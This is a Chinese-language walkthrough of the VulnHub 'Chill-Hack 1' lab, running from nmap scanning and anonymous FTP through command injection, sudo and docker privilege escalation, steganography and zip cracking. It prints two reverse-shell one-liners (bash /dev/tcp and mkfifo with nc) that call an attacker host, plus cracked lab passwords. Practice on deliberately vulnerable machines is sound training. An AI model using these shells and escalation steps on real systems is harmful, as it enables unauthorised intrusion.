VulnHub-Chill-Hack 1 靶场渗透实验

一、信息收集

1、收集靶机的ip

 nmap来扫描存活的主机

nmap -sn 192.168.226.0/24（ -v表示显示过程）

根据扫描的结果，可以继续验证目标靶机的ip

 

确定目标靶机地址是192.168.226.131

 

 

2、根据得到的靶机ip，继续扫描靶机相关的服务开放情况

nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv

-sC   –script=default   默认的脚本扫描，主要是搜集各种应用服务的信息

-sV     端口服务及版本

 

Discovered open port 22/tcp on 192.168.226.131

Discovered open port 21/tcp on 192.168.226.131

Discovered open port 80/tcp on 192.168.226.131

猜想可行的入侵方向：

(1)21端口存在匿名用户登录的利用方式

(2).80端口是Apache httpd 2.4.29 可能存在换行解析漏洞，可能可以利用

 

(1).匿名登录ftp，下载并查看note.txt文件，得到一个提示

(2)登录自带的web网站，静态网站，发现没有可以利用的后台数据库，没有漏洞点

使用目录扫描工具dirb，对这个静态网站的目录进行扫描，进一步信息收集

发现secret目录，可能存在命令执行漏洞

bash -i >& /dev/tcp/192.168.226.132/6666 0>&1

 

二、边界突破

1、漏洞利用

ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.226.132 6666>/tmp/f

 

反弹shell执行环境   使用nc来配合

 

2、横向扩展

 

sudo -l 查看我能执行的高权限指令和文件

发现helpline.sh

利用脚本文件，进行二次命令执行

最终拿到了用户flags

继续尝试，找root的flags

在/var/www/files路径中发现hacker.php，查看文件内容，得到提示

将图片下载到本地

使用steghide可以将信息提取出来，得到backup.zip，解密需要密码

使用fcrackzip工具暴力破解zip密码，使用kali系统自带的/usr/share/wordlists/rockyou.txt字典

得到密码 pass1word

解压得到source_code.php

根据文件内容可以判断出这是登录页面的程序，判断输入的密码是否正确

密码：!d0ntKn0wmYp@ssw0rd

 

猜测密码是ssh用户的，查看ssh用户名anurodh

 

使用ssh登录，在登录anurodh用户

搜索docker获取相关信息，得到提权命令，获取root权限

成功！